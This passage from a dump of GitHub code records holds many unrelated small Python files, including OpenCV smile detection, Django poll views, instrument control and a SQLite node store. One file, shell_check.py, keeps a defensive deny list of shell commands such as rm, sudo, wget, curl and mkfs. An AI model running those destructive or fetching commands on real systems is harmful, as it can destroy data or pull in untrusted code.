(0,0,0), -1, lineType=8, shift=0)\n cv.Circle(image, eyept2, int(w/9), (0,0,0), -1, lineType=8, shift=0)\n \n global smileness \n smileness = smile[1]\n cv.SetImageROI(image, (pt1[0],\n (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 )),\n pt2[0] - pt1[0],\n int((pt2[1] - (pt1[1] + (abs(pt1[1]-pt2[1]) / 1.6 ))))))\n else:\n cv.ResetImageROI(image)\n cv.Circle(image, ( (pt1[0] +pt2[0])/2 ,(pt1[1] + pt2[1])/2 ), w, (0,0,255), -1, lineType=8, shift=0)\n eyept1 = (int((pt1[0] + (pt1[0]+pt2[0])/2)/2),int((pt1[1] + (pt1[1] + pt2[1])/2 ))/2)\n eyept2 = (int(((pt1[0]+pt2[0])/2+pt2[0])/2),int(((pt1[1]+pt2[1])/2 + pt1[1])/2))\n cv.Circle(image, eyept1, int(w/9), (0,0,0), -1, lineType=8, shift=0)\n cv.Circle(image, eyept2, int(w/9), (0,0,0), -1, lineType=8, shift=0)\n smilept1 = (int((pt1[0] + (pt1[0]+pt2[0])/2)/2),int((pt2[1] + (pt1[1] + pt2[1])/2 ))/2)\n smilept2 = (int(((pt1[0]+pt2[0])/2+pt2[0])/2),int(((pt1[1]+pt2[1])/2 + pt2[1])/2))\n cv.Line(image, smilept1, smilept2, (0,0,0), thickness=3, lineType=8, shift=0)\n cv.SetImageROI(image, (pt1[0],\n (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 )),\n pt2[0] - pt1[0],\n int((pt2[1] - (pt1[1] + int(abs(pt1[1]-pt2[1]) / 1.6 ))))))\n cv.ResetImageROI(image)\n cv.ResetImageROI(image)\n return image\n\nfaceCascade = cv.Load(\"haarcascade_frontalface_alt.xml\")\n#eyeCascade = cv.Load(\"haarcascade_eye.xml\")\nsmileCascade = cv.Load(\"smileD/smiled_01.xml\")\n#smileCascade = cv.Load(\"haarcascade_smile.xml\")\n\n\nwhile True:\n img = cv.QueryFrame(capture)\n \n if img:\n image = DetectRedEyes(img, faceCascade, smileCascade)\n cv.ShowImage(\"camera\", image)\n #print smileness\n \n k = cv.WaitKey(5);\n if k == 27:\n break\n \ncv.DestroyAllWindows()\n","repo_name":"amogrr/Moodmeter","sub_path":"smile-detect.py","file_name":"smile-detect.py","file_ext":"py","file_size_in_byte":7747,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"29733828120","text":"#이진탐색\ndef binary_search(arr, key):\n start = 0\n end = len(arr)\n while start <= end:\n middle = (start+end) // 2\n #경우의 수 1. key값과 middle이 같은 경우\n if arr[middle] == key:\n return True, middle\n\n #경우의 수 2. key값이 middle보다 큰 경우\n #end를 미들보다 작게 만들어준다\n elif arr[middle] > key:\n end = middle - 1\n\n #경우의 수 3. key값이 middle보다 작은 경우\n #start를 middle보다 크게 만들어준다\n else:\n start = middle + 1\n return False, -1\n\narr = [ 2, 4, 7, 9, 11, 19, 23]\nkey = 19\nprint(binary_search(arr, key))","repo_name":"likelionSungGuk/algorithm","sub_path":"0805/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5883629210","text":"#Gavin Murdock\n#Guess Number\n#3-4-22\n\nfrom tkinter import *\nfrom settings import *\nfrom game import *\nclass GuessNumber(Frame):\n def __init__(self):\n super(GuessNumber,self).__init__()\n self.master.title(title)\n self.board = Board()\n self.pack()\n\ndef main():\n root=Tk()\n x=GuessNumber()\n root.mainloop()\nif __name__ == \"__main__\":\n main()\n","repo_name":"gavinbot32/GavinM.FinalPortfolio","sub_path":"project 6/guessnumber/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71805681846","text":"quantity = 2\nitems = 500\nprice = 50.50\nmyorder = \"I want {} pieces of item {} for {} dollars.\"\nprint(myorder.format(quantity, items, price))\n\nquantity = 5\nitems = 600\nprice = 100.50\nmyorder = \"I want to pay {2} dollars for {0} pieces of item {1}.\"\nprint(myorder.format(quantity, items, price))\n","repo_name":"ValentineFernandes/Python","sub_path":"formatstring.py","file_name":"formatstring.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"6051062736","text":"__author__ = 'R.Azh'\n# http://www.ibm.com/developerworks/library/l-prog/\n\n# Normal statement-based flow control\n# if : func1()\n# elif : func2()\n# else: func3()\n\n# Equivalent \"short circuit\" expression\n# ( and func1()) or ( and func2()) or (func3())\n\n\nx = 3\n\n\ndef pr(s): print(s)\n\n# if x == 1:\n# pr('one')\n# elif x == 2:\n# pr('two')\n# else:\n# pr('other')\n\n(x == 1 and pr('one')) or (x == 2 and pr('two')) or pr('other')\nprint('\\n')\nx = 2\n(x == 1 and pr('one')) or (x == 2 and pr('two')) or pr('other') # don't work properly :(\n\nprint('############ using lambda #################')\n\n\npri = lambda s: print(s)\n\n\nnamenum = lambda x: (x == 1 and pr(\"one\")) \\\n or (x == 2 and pr(\"two\")) \\\n or (pr(\"other\"))\n\nnamenum(1)\nprint('\\n')\nnamenum(2)\nprint('\\n')\nnamenum(3)\n\n","repo_name":"r-azh/TestProject","sub_path":"TestPython/test_functional_programming/ibm_tutorial/1_eliminating_flow_control_statements.py","file_name":"1_eliminating_flow_control_statements.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42333570303","text":"import json\n\nfrom django.core.serializers import serialize\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\n\nfrom apps.polling_results.forms import PartyResultForm\nfrom apps.polling_results.models import AnnouncedPUResults\nfrom apps.polling_units.models import PollingUnit, LGA, State, PartyResult\n\n\nclass Home(View):\n def get(self, request):\n polling_units = PollingUnit.objects.all()\n return render(request, \"index.html\", context={\"polling_units\": polling_units})\n\n def post(self, request):\n uniqueid = request.POST.get(\"uniqueid\")\n print(uniqueid)\n results = AnnouncedPUResults.objects.filter(polling_unit_uniqueid=uniqueid)\n return JsonResponse({\n 'results': list(results),\n \"status\": \"success\",\n \"message\": \"Result fetched successfully.\"\n })\n\n\nclass LGATotalResult(View):\n def get(self, request):\n states = State.objects.all()\n return render(request, 'lga_select.html', {'states': states})\n\n def post(self, request):\n lga_id = request.POST.get('lga')\n print(f'lga_id: {lga_id}')\n lga = get_object_or_404(LGA, uniqueid=lga_id)\n polling_units = PollingUnit.objects.filter(lga=lga)\n results = AnnouncedPUResults.objects.filter(polling_unit_uniqueid__in=polling_units)\n total_result = {}\n for result in results:\n if result.party_abbreviation in total_result:\n total_result[result.party_abbreviation] += result.party_score\n else:\n total_result[result.party_abbreviation] = result.party_score\n return JsonResponse(total_result)\n\n\nclass CreatePollingUnit(View):\n def get(self, request):\n form = PartyResultForm()\n return render(request, 'create_polling_unit.html', {'form': form})\n\n def post(self, request):\n if request.method == 'POST':\n form = PartyResultForm(request.POST)\n if form.is_valid():\n polling_unit = form.save() # Save the polling unit information\n party_results = form.cleaned_data['party_results'] # Get the party results from the form\n # Create PartyResult objects for each party result and associate them with the polling unit\n for party, result in party_results.items():\n PartyResult.objects.create(polling_unit=polling_unit, party=party, result=result)\n response_data = {\n 'polling_unit_id': polling_unit.id,\n 'party_results': [\n {'party': party, 'result': result}\n for party, result in party_results.items()\n ]\n }\n return JsonResponse(response_data)\n else:\n form = PartyResultForm()\n return render(request, 'create_polling_unit.html', {'form': form})\n\n\nclass GetStateLGA(View):\n def post(self, request):\n state_id = request.POST.get('stateId')\n lgas = LGA.objects.filter(state_id=state_id)\n lgas_data = json.loads(serialize('json', lgas))\n print(f\"lgas_data: {lgas_data}\")\n return JsonResponse({\n \"status\": \"success\",\n \"lgas\": lgas_data,\n \"message\": \"Data fetched successfully\"\n })\n","repo_name":"Gerard-007/Bincom_Assesment","sub_path":"poll_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27794168718","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as fh:\n long_description = \"\\n\" + fh.read()\n\nVERSION = '0.0.3'\nDESCRIPTION = 'An unofficial package to interact with the Radar Bot Directory API'\nLONG_DESCRIPTION = 'A (unofficial) package that allows you to interact with the Radar Bot Directory'\n\n# Setting up\nsetup(\n name=\"radarbots.py\",\n version=VERSION,\n author=\"Yoshiboi18303 (Brice Coley)\",\n author_email=\"\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n packages=find_packages(),\n install_requires=[\"discord.py\", \"requests\"],\n keywords=['python', 'discord', 'radarbotdirectory'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)\n","repo_name":"Yoshiboi18303/radarbots.py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25527698462","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QDesktopServices\nfrom PyQt5.QtWidgets import QTreeWidgetItem, QLabel, QCheckBox, QProgressBar\n\n\nclass QScrapperTreeItem(QTreeWidgetItem):\n\n @property\n def title(self):\n return self.text(0)\n\n @title.setter\n def title(self, text):\n self.setText(0, text)\n\n @property\n def duration(self):\n return self.itemDurationLabel.text()\n\n @duration.setter\n def duration(self, value):\n self.itemDurationLabel.setText(value)\n \n @property\n def path(self):\n return self.itemPathLabel.text()\n\n @path.setter\n def path(self, value):\n self.itemPathLabel.setText(value)\n\n @property\n def downloaded(self):\n return self.itemDownloadedCheckBox.isChecked()\n\n @downloaded.setter\n def downloaded(self, checked):\n self.itemDownloadedCheckBox.setChecked(checked)\n\n @property\n def progress(self):\n return self.itemProgressBar.value()\n\n @progress.setter\n def progress(self, value):\n self.itemProgressBar.setValue(value)\n\n def __init__(self, parent, entity):\n super(QScrapperTreeItem, self).__init__(parent)\n self.entity = entity\n\n # column 0 - Course/Lecture Title\n self.setText(0, entity.title)\n\n # column 1 - Duration\n self.itemDurationLabel = QLabel()\n self.itemDurationLabel.setText(f\"{entity.duration} mins\")\n # self.itemDurationLabel.setAlignment(Qt.AlignCenter)\n self.treeWidget().setItemWidget(self, 1, self.itemDurationLabel)\n\n # column 2 - Source\n self.itemSourceLabel = QLabel()\n self.itemSourceLabel.setOpenExternalLinks(True)\n self.itemSourceLabel.setText(f'
{entity.source}')\n self.itemSourceLabel.setTextInteractionFlags(Qt.TextBrowserInteraction)\n # self.itemSourceLabel.setAlignment(Qt.AlignCenter)\n self.treeWidget().setItemWidget(self, 2, self.itemSourceLabel)\n\n\n # column 3 - Progress\n self.itemProgressBar = QProgressBar()\n self.itemProgressBar.setValue(0)\n self.treeWidget().setItemWidget(self, 3, self.itemProgressBar)\n\n\n # column 4 - Downloaded\n self.itemDownloadedCheckBox = QCheckBox()\n self.itemDownloadedCheckBox.setCheckable(False)\n self.itemDownloadedCheckBox.setContentsMargins(10, 0, 10, 0)\n self.treeWidget().setItemWidget(self, 4, self.itemDownloadedCheckBox)\n\n # column 5 - Path\n self.itemPathLabel = QLabel()\n self.itemPathLabel.setOpenExternalLinks(True)\n self.itemPathLabel.setText(f'{entity.path}')\n self.itemPathLabel.setTextInteractionFlags(Qt.TextBrowserInteraction)\n # self.itemPathLabel.setAlignment(Qt.AlignCenter)\n self.treeWidget().setItemWidget(self, 5, self.itemPathLabel)\n\n if self.downloaded:\n self.itemProgressBar.setVisible(False)\n\n","repo_name":"atthealchemist/mosh_scrapper","sub_path":"widgets/QScrapperTreeItem.py","file_name":"QScrapperTreeItem.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35263903296","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 7 10:18:11 2021\n\n@author: jwbrooks\n\"\"\"\n\nimport johnspythonlibrary2 as jpl2\nimport nrl_code as nrl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport pandas as pd\nfrom time import sleep\n\nimport socket\n\nclass fwbell_7030_prologix:\n\t\n\t# https://www.atecorp.com/atecorp/media/pdfs/data-sheets/fwbell_7030_manual.pdf\n\t\n\tdef __init__(self, ip='192.168.0.241', gpib_address=b'1'):\n\t\tself.ip = ip\n\t\tself.gpib_address = gpib_address\n\t\tself.connect()\n\t\tsleep(0.1)\n\t\tself.init_gpib_eth()\n\t\tsleep(0.1)\n# \t\tself.init_hp34970a()\n\t\tsleep(1)\n\t\t\n\tdef disconnect(self):\n\t\tself.sock.close()\n\t\t\n\tdef send_command(self,command, wait_time=0.1):\n\t\tself.sock.send( (command + '\\n').encode() )\n\t\tsleep(wait_time)\n\t\t\n\tdef receive_response(self,num_bytes=100000, max_wait_time=10):\n\t\tresponse=b''\n\t\ttotal_time=0\n\t\twait_interval=0.5\n\t\twhile(response[-1:] != b'\\n' and total_timemax_wait_time:\n# \t\t\t\tbreak\n\t\t\tif total_time>0 and response==b'':\n\t\t\t\tbreak\n\t\t\tsleep(wait_interval)\n\t\t\ttotal_time+=wait_interval\n# \t\t\tprint(total_time, wait_time)\n\t\t\ttry:\n\t\t\t\tresponse+=self.sock.recv(num_bytes)\n\t\t\texcept:\n\t\t\t\tpass\n# \t\t\tprint(response)\n\n\t\t#print('done', response)\n \t\t\t\n\t\treturn response\n\t\n\tdef send_and_receive(self,command,wait_time=0.1,num_bytes=100000):\n\t\tself.send_command(command, wait_time=wait_time)\n\t\treturn self.receive_response(num_bytes)\n\t\t\n\tdef connect(self):\n\t\t# if having trouble connecting, try the GPIB Configurator app from the prologix website\n\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)\n\t\tsock.settimeout(1)\n\t\tsock.connect((self.ip, 1234))\n\t\t\n\t\t# confirm connection by printing connection details\n\t\tsock.send(b\"++ver\\n\")\n\t\tsleep(1)\n\t\tprint(b\"Connected to '%s'\"%sock.recv(100000))\n\t\tprint(sock)\n\t\t\n\t\tself.sock = sock\n\t\t\n\t\tself.init_fwbell7030()\n\t\t\n\tdef init_gpib_eth(self):\n\t\t# Set mode as CONTROLLER\n\t\tself.sock.send(b\"++mode 1\\n\")\n\t\t\n\t\t# Set HP33120A address\n\t\tself.sock.send(b\"++addr %s\\n\"%self.gpib_address)\n\t\t\n\tdef init_fwbell7030(self):\n\t\t\n\t\tself.sock.send(b'*IDN?\\n')\n\t\tprint('Connected to',self.receive_response())\n\t\t\n\t\t# set each channel to DC\n\t\tself.send_command(':SENSe1:FLUX:DC') \n\t\tself.send_command(':SENSe2:FLUX:DC') \n\t\tself.send_command(':SENSe3:FLUX:DC') \n\t\t\n# \tdef init_hp34970a(self, channels='@201:218'):\n# \t\t#TODO I need a confirmation command that I'm actually talking with this unit.\n# \t\t#TODO the commands in this section need to be vetted.\n# \t\tif True:\n# \t\t\tself.sock.send(b'*RST\\n')\t# A Factory Reset (*RST command) turns off the units, time, channel, and alarm information\n# \t\t\tself.sock.send(b':ABORt\\n')\t# stops a scan\n# \t# \t\tself.sock.send(b':CONFigure:TEMPerature %s,%s,(%s)\\n' % (b'TCouple', b'K', b'@102:104'))\n# \t# \t\tself.sock.send(b':CONFigure:VOLT:DC 1,(@101:120') # configures 1V range at channels 101 to 120\n# \t\t\tself.sock.send(b':CONFigure:VOLT:DC AUTO,(%s)\\n'%channels.encode()) # configures auto range at channels 101 to 120\n# # \t\t\tself.sock.send(b':CONFigure:VOLT:DC AUTO,(@101:122') # configures auto range at channels 101 to 120\n# \t# \t\tself.sock.send(b':UNIT:TEMPerature %s\\n' % (b'C'))\n# \t\t\tself.sock.send(b':ROUTe:SCAN (%s)\\n' % (channels.encode())) # configures channels 101 to 122 to be scanned\n# \t\t\tself.sock.send(b':TRIGger:SOURce %s\\n' % (b'TIMer')) # setup a timer to automatically trigger the scan\n# \t\t\tself.sock.send(b':TRIGger:COUNt %d\\n' % (1)) #number of scans\n# \t\t\tself.sock.send(b':TRIGger:TIMer %G\\n' % (1.0)) # trigger interval in seconds\n# \t\t\tself.sock.send(b':FORMat:READing:CHANnel %d\\n' % (1)) # 1 includes channel number in returned data\n# \t\t\tself.sock.send(b':FORMat:READing:ALARm %d\\n' % (0)) # 0 removes alarm inforation from returned data\n# \t\t\tself.sock.send(b':FORMat:READing:UNIT %d\\n' % (1)) # 1 includes the unit for measured data\n# \t\t\tself.sock.send(b':FORMat:READing:TIME:TYPE %s\\n' % (b'ABSolute')) # sets the time format type\n# \t\t\tself.sock.send(b':FORMat:READing:TIME %d\\n' % (1)) # 1 includes the time in the returned data\n# \t# \t\tself.sock.send(b':SYSTem:TIME %.2d,%.2d,%s\\n' % (1)) # print('%.2d.%s'%(a,('%.3f'%a)[2:]))\n# \t\t\n# \t\tif False: # This is backup that works. Saving here in case of sanity check\t\t\t\n# \t\t\tself.sock.send(b'*RST\\n')\t# A Factory Reset (*RST command) turns off the units, time, channel, and alarm information\n# \t\t\tself.sock.send(b':ABORt\\n')\t# stops a scan\n# \t\t\tself.sock.send(b':CONFigure:TEMPerature %s,%s,(%s)\\n' % (b'TCouple', b'K', b'@102:104'))\n# \t# \t\tself.sock.send(b':CONFigure:VOLT:DC 1,(@101:120') # configures 1V range at channels 101 to 120\n# # \t\t\tself.sock.send(b':CONFigure:VOLT:DC AUTO,(@101:122') # configures auto range at channels 101 to 120\n# \t\t\tself.sock.send(b':UNIT:TEMPerature %s\\n' % (b'C'))\n# \t\t\tself.sock.send(b':ROUTe:SCAN (%s)\\n' % (b'@101:122')) # configures channels 101 to 122 to be scanned\n# \t\t\tself.sock.send(b':TRIGger:SOURce %s\\n' % (b'TIMer')) # setup a timer to automatically trigger the scan\n# \t\t\tself.sock.send(b':TRIGger:COUNt %d\\n' % (1)) #number of scans\n# \t\t\tself.sock.send(b':TRIGger:TIMer %G\\n' % (1.0)) # trigger interval in seconds\n# \t\t\tself.sock.send(b':FORMat:READing:CHANnel %d\\n' % (1)) # 1 includes channel number in returned data\n# \t\t\tself.sock.send(b':FORMat:READing:ALARm %d\\n' % (0)) # 0 removes alarm inforation from returned data\n# \t\t\tself.sock.send(b':FORMat:READing:UNIT %d\\n' % (1)) # 1 includes the unit for measured data\n# \t\t\tself.sock.send(b':FORMat:READing:TIME:TYPE %s\\n' % (b'ABSolute')) # sets the time format type\n# \t\t\tself.sock.send(b':FORMat:READing:TIME %d\\n' % (1)) # 1 includes the time in the returned data\n# \t# \t\tself.sock.send(b':SYSTem:TIME %.2d,%.2d,%s\\n' % (1)) # print('%.2d.%s'%(a,('%.3f'%a)[2:]))\n# \t\t\n\t\t\t\n\t\t\n# \tdef _get_data_raw(self, wait_time=10):\n# \t\tself.init_hp34970a()\n# \t\tself.receive_response() #clear buffer\n# \t\tsleep(0.1)\n# \t\tself.sock.send(b':READ?\\n')\n# \t\treturn self.receive_response(max_wait_time=wait_time)\n\n\t\t\n# \tdef get_data(self, wait_time=10, plot=False):\n# \t\t\n# \t\traw_data=self._get_data_raw(wait_time=wait_time)\n# \t\traw_data=np.array(raw_data.decode('ascii').split(',')).reshape(-1,8)\n\n# \t\tdata=np.zeros(raw_data.shape[0])\n# \t\tchannels=np.zeros(raw_data.shape[0],dtype=int)\n# \t\tfor i in range(len(data)):\n# \t\t\tdata[i]=np.float(raw_data[i,0].split(' ')[0])\n# \t\t\tchannels[i]=int(raw_data[i,7])\n# \t\t\n# \t\tdata_out = xr.DataArray( data,\n# \t\t\t\t\t\t\t dims='ch',\n# \t\t\t\t\t\t\t coords=[channels])\n# \t\t\n# \t\tif plot==True:\n# \t\t\tfig,ax=plt.subplots()\n# \t\t\tdata_out.plot(ax=ax)\n# \t\t\n# \t\treturn data_out\n\n\tdef measure_all_channels(self):\n\t\tm1=float(self.send_and_receive('MEAS1:FLUX?').decode().split(';')[0])\n\t\tm2=float(self.send_and_receive('MEAS2:FLUX?').decode().split(';')[0])\n\t\tm3=float(self.send_and_receive('MEAS3:FLUX?').decode().split(';')[0])\n\t\treturn m1,m2,m3\n\t\nif __name__ == '__main__':\n\tunit = fwbell_7030_prologix()\n# \tunit.send_and_receive('MEAS1:FLUX?')\n\tm_x, m_y, m_z=unit.measure_all_channels()\n\tprint(m_x, m_y, m_z)\n\tunit.disconnect()\n# \tprint(unit.send_and_receive('++ver'))\n# \t\n# \tfig,ax=plt.subplots()\n# \tch=1\n# \tdata=unit.get_data()\n# \tdata.plot(ax=ax)\n# \tax.legend()\n# \tunit.disconnect()\n# # \t","repo_name":"jwbrooks0/johnspythonlibrary2","sub_path":"Instruments/fwbell_7030.py","file_name":"fwbell_7030.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19271667607","text":"from aiohttp import web\n\nfrom app.views import HealthView, GetInfo, InsertInfo\n\n\ndef inject_routes(app: web.Application) -> None:\n \"\"\"Инициализация роутов.\"\"\"\n app.add_routes(\n [\n web.view(\"/heartbeat\", HealthView),\n web.view(\"/add\", InsertInfo),\n web.view(\"/status\", GetInfo)\n ]\n )\n","repo_name":"ansh120022/InnopolisCourse","sub_path":"async_delivery/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34219580660","text":"def countConstruct(s, words, memo):\n if s in memo:\n return memo[s]\n if s==\"\":\n return 1\n \n totCount=0\n\n for word in words:\n if s.startswith(word):\n val=countConstruct(s[len(word):], words, memo)\n totCount+=val\n \n memo[s]=totCount\n return memo[s]\n \n\n\ndef canConstruct(s, words, memo):\n if s in memo:\n return memo[s]\n if s==\"\":\n return True\n for word in words:\n if s.startswith(word):\n if canConstruct(s[len(word):], words, memo) == True:\n memo[s] = True\n return memo[s]\n\n memo[s]=False\n return memo[s]\n\n\n\ndef howSum(target, numbers, memo):\n if target in memo:\n return memo[target]\n if target == 0:\n return []\n if target<0:\n return None\n shortest = None\n\n for i in numbers:\n sum=howSum(target-i, numbers, memo) \n if sum!=None:\n memo[target]=sum+[i]\n if shortest==None or len(shortest)>len(memo[target]):\n shortest = memo[target]\n\n memo[target]= shortest\n return memo[target]\n\n\n\ndef canSum(target, numbers, memo):\n if target in memo:\n return memo[target]\n if target==0:\n return True\n if target<0:\n return False\n \n for i in numbers:\n if canSum(target-i, numbers, memo)==True:\n memo[target]=True\n return True\n memo[target]=False\n return False","repo_name":"N-liraj-khanna/Data-Structures-and-Algorithms","sub_path":"dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"38818617166","text":"import sqlite3 as lite\n\n\nclass Database:\n table = (\"id INTEGER PRIMARY KEY AUTOINCREMENT\", \"ip TEXT\", \"port INTEGER\", \"public_key TEXT\", \"is_up BOOL\")\n\n def __init__(self):\n \"\"\"\n setting up the interface that communicates with the database\n \"\"\"\n self.dbPath = 'database/nodes.db'\n self.con = lite.connect(self.dbPath)\n # for debugging\n self.create_table_if_not_exists(\"nodes\", self.table)\n padder = \"-\"*150\n print(\"NODES:\")\n print(f'\\n{padder}\\n'.join(map(str, self.get_all_nodes())))\n ######\n\n def query(self, sql):\n \"\"\"\n function that execute sql query on the database\n :param sql: str - the sql query\n :return: list - list of the rows of the database\n \"\"\"\n\n rows = []\n\n try:\n cur = self.con.cursor()\n cur.execute(sql)\n self.con.commit()\n rows = cur.fetchall()\n except lite.Error as e:\n print(f\"sql error: {e}\")\n\n return rows\n\n def create_table_if_not_exists(self, name, params):\n \"\"\"\n creates table in the database if the table doesn't exist\n :param name: str - table name\n :param params: tuple (or any iterable) - table params\n :return: None\n \"\"\"\n table_params = \",\".join((param for param in params))\n query = f\"CREATE TABLE IF NOT EXISTS {name} ({table_params})\"\n\n self.query(query)\n\n def check_if_exists(self, name, params):\n \"\"\"\n checking if data exists in the database\n :param name: str - table name\n :param params: data to check if exists\n :return: bool - exists or not\n \"\"\"\n\n search_params = \" AND \".join((param[0] + \"=\" + param[1] for param in params))\n query = f\"SELECT * FROM {name} WHERE {search_params}\"\n rows = self.query(query)\n return len(rows) != 0\n\n def add_node(self, ip, port, public_key, is_up):\n \"\"\"\n checking if the node can be added to the database and adding it\n :param ip: ip of node\n :param port: preferred port to contact node\n :param public_key: the node's public_key\n :param is_up: bool - if is up\n :return: bool - if successful\n \"\"\"\n\n self.create_table_if_not_exists(\"nodes\", self.table)\n\n if self.check_if_exists(\"nodes\", ((\"ip\", f\"'{ip}'\"), (\"port\", f\"{port}\"))):\n self.query(f\"UPDATE nodes SET public_key = '{public_key}' WHERE ip = '{ip}' AND port = {port}\")\n if is_up:\n self.query(f\"UPDATE nodes SET is_up = 1 WHERE ip = '{ip}' AND port = {port}\")\n else:\n self.query(f\"UPDATE nodes SET is_up = 0 WHERE ip = '{ip}' AND port = {port}\")\n return False\n\n self.query(f\"INSERT INTO nodes(ip, port, public_key, is_up) VALUES('{ip}', {port}, '{public_key}', {is_up})\")\n return True\n\n def deactivate_node(self, ip, port):\n \"\"\"\n if node is down, deactivate it\n :param ip: ip of node\n :param port: preferred port to contact node\n :return: None\n \"\"\"\n\n self.create_table_if_not_exists(\"nodes\", self.table)\n\n self.query(f\"UPDATE nodes SET is_up = 0 WHERE ip = '{ip}' AND port = {port}\")\n\n def remove_node(self, ip, port):\n \"\"\"\n function that removes a node from the nodes table by the ip and port\n :param ip: ip of node\n :param port: preferred port to contact node\n :return: None\n \"\"\"\n self.create_table_if_not_exists(\"nodes\", self.table)\n\n self.query(f\"DELETE FROM nodes WHERE ip = '{ip}' AND port = {port}\")\n\n def check_node_exists(self, ip, port):\n \"\"\"\n function that checks if node exists in the database\n :param ip: ip of node\n :param port: preferred port to contact node\n :return: bool - exists or not\n \"\"\"\n\n self.create_table_if_not_exists(\"nodes\", self.table)\n\n return self.check_if_exists(\"nodes\", ((\"ip\", f\"'{ip}'\"), (\"port\", f\"{port}\")))\n\n def get_node(self, ip, port):\n \"\"\"\n returning node row by ip and port\n :param ip: ip of node\n :param port: preferred port to contact node\n :return: tuple - user row\n \"\"\"\n\n return self.query(f\"SELECT * FROM nodes WHERE ip = '{ip}' AND port = {port}\")[0]\n\n def get_all_nodes(self, is_up=0):\n \"\"\"\n return all nodes\n :param is_up: if true, gives back only nodes that are up\n :return: list\n \"\"\"\n if is_up:\n return self.query(f\"SELECT * FROM nodes WHERE is_up = 1\")\n return self.query(f\"SELECT * FROM nodes\")\n\n def delete_all_nodes(self):\n \"\"\"\n deletes all entries in table\n :return:\n \"\"\"\n return self.query(\"DELETE FROM nodes\")\n\n\nif __name__ == '__main__':\n db = Database()\n db.delete_all_nodes()\n # with open(\"keys/public_key1.pem\", \"r\") as p:\n # pk1 = p.read()\n # with open(\"keys/public_key2.pem\", \"r\") as p:\n # pk2 = p.read()\n # db.add_node(\"10.0.0.33\", 443, pk1, 1)\n # db.add_node(\"10.0.0.33\", 33, pk2, 1)\n # print(\"all\", db.get_all_nodes())\n # print(\"all active\", db.get_all_nodes(1))\n # print(\"only one\", db.get_node(\"10.0.0.33\", 33))\n\n","repo_name":"nom28/Tor_Final_Project","sub_path":"ds/database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11205186134","text":"def match_brackets(input_string):\n open_bracs = ['[', '{', '(']\n close_bracs = [']', '}', ')']\n\n brac_list = []\n for i in input_string:\n if i in open_bracs:\n brac_list.append(i)\n elif i in close_bracs:\n pos = close_bracs.index(i)\n if ((len(brac_list) > 0) and\n (open_bracs[pos] == brac_list[len(brac_list) - 1])):\n brac_list.pop()\n else:\n return False\n\n if len(brac_list) == 0:\n return True\n else:\n return False\n\n\nprint(match_brackets(\"({[)]\"))\nprint(match_brackets(\"()[]{}\"))\n","repo_name":"iamsubingyawali/PyAssignment2","sub_path":"prog_19.py","file_name":"prog_19.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5777207362","text":"import streamlit as st\n\n\ndef check_shell(command):\n arr = [\"rm\", \"sudo\",\"systemctl\",\"wget\",\"mv\",\"ufw\",\"kill\",\"mkfs\",\"curl\",\"sysctl\"]\n for disallowed_command in arr:\n if disallowed_command in command:\n st.error(\"'\" + command + \"'\" + \" is not allowed, contact admin\")\n return \"invalid\"\n return command\n\n\n# print(check_shell(\"date\"))\n","repo_name":"ExpectoX1/server_automate","sub_path":"backend/functions/shell_check.py","file_name":"shell_check.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16172037100","text":"#!/usr/bin/env python\n\nimport os\nimport logging\nfrom datetime import datetime as dt\n\nfrom bgcore import tsv\nfrom fannsdb.mutations.mutation import Mutation\nfrom fannsdb.mutations.parser import 